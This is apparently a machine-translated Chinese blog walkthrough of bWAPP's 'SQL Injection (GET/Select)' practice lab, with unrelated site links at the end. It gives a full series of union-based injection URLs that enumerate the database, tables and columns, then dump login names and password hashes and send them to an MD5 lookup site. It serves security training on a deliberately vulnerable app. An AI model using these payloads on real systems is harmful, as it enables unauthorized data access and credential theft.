当前位置:网站首页>SQL Injection (GET/Select)
SQL Injection (GET/Select)
2022-07-03 13:32:00 【this is hhhhp】
Choose a little bit , Observe URL, Only movie The value of is changing , and GET/Search Medium title It should be the same
Look at the type
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 or 1=1 &action=go
1. Check the number of fields
http://192.168.3.95/bWAPP/sqli_2.php?movie=1 order by 7 &action=go
2. View displayable fields
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,2,3,4,5,6,7 &action=go
2,3,4,5 Is a displayable field
3. Blast storage
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,database(),3,4,5,6,7 &action=go
Library name :bWAPP
4. Explosion meter
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database() &action=go
Found that only burst out 1 Tables
use group_concat() Put the watches together
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() &action=go
This time there is 5 It's a table. , We need to use it. users
5. Pop field
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'&action=go
We need to use it. login and password
6. Pop field content
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(login),group_concat(password),4,5,6,7 from bWAPP.users &action=go
2 individual
7.MD5 Decrypt https://www.cmd5.com/
边栏推荐
- SVN添加文件时的错误处理:…\conf\svnserve.conf:12: Option expected
- JSON serialization case summary
- February 14, 2022, incluxdb survey - mind map
- SwiftUI 开发经验之作为一名程序员需要掌握的五个最有力的原则
- Tencent cloud tdsql database delivery and operation and maintenance Junior Engineer - some questions of Tencent cloud cloudlite certification (TCA) examination
- Flink SQL knows why (19): the transformation between table and datastream (with source code)
- KEIL5出现中文字体乱码的解决方法
- Flink SQL knows why (13): is it difficult to join streams? (next)
- File uploading and email sending
- Error handling when adding files to SVN:.... \conf\svnserve conf:12: Option expected
猜你喜欢
研发团队资源成本优化实践
MyCms 自媒体商城 v3.4.1 发布,使用手册更新
Multi table query of MySQL - multi table relationship and related exercises
The difference between stratifiedkfold (classification) and kfold (regression)
Flink SQL knows why (17): Zeppelin, a sharp tool for developing Flink SQL
Flink SQL knows why (7): haven't you even seen the ETL and group AGG scenarios that are most suitable for Flink SQL?
已解决TypeError: Argument ‘parser‘ has incorrect type (expected lxml.etree._BaseParser, got type)
PowerPoint 教程,如何在 PowerPoint 中将演示文稿另存为视频?
Resolved (error in viewing data information in machine learning) attributeerror: target_ names
已解决(机器学习中查看数据信息报错)AttributeError: target_names
随机推荐
Multi table query of MySQL - multi table relationship and related exercises
CVPR 2022 | 美团技术团队精选6篇优秀论文解读
Flink SQL knows why (VIII): the wonderful way to parse Flink SQL tumble window
[sort] bucket sort
Kivy教程之 盒子布局 BoxLayout将子项排列在垂直或水平框中(教程含源码)
刚毕业的欧洲大学生,就能拿到美国互联网大厂 Offer?
Can newly graduated European college students get an offer from a major Internet company in the United States?
Will Huawei be the next one to fall
MySQL functions and related cases and exercises
用户和组命令练习
Flink SQL knows why (19): the transformation between table and datastream (with source code)
【被动收入如何挣个一百万】
106. 如何提高 SAP UI5 应用路由 url 的可读性
Realize the recognition and training of CNN images, and process the cifar10 data set and other methods through the tensorflow framework
PowerPoint 教程,如何在 PowerPoint 中将演示文稿另存为视频?
Detailed explanation of multithreading
SVN添加文件时的错误处理:…\conf\svnserve.conf:12: Option expected
Elk note 24 -- replace logstash consumption log with gohangout
服务器硬盘冷迁移后网卡无法启动问题
Libuv Library - Design Overview (Chinese version)